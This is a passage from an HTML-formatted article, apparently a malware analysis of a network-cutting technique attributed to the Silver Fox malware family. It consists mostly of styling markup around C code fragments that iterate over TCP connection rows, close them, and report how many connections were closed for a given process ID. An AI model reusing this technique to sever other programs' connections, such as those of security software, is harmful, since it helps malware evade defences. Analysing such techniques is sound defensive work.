none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">IN_ADDR remoteAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemoteAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;</span><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">[-] Closed TCP connection: %S:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%d</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> -&gt; %S:</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%d\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                    </span></span><span leaf="">inet_ntoa</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ntohs</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">u_short</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalPort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                    </span></span><span leaf="">inet_ntoa</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remoteAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ntohs</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">u_short</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemotePort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">));</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">else</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;</span><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">[!] Failed to close connection. Error code: </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%lu\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;, result</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">closedCount </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[=] Closed </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%d</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> connections for PID </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%lu\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;, closedCount, pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: 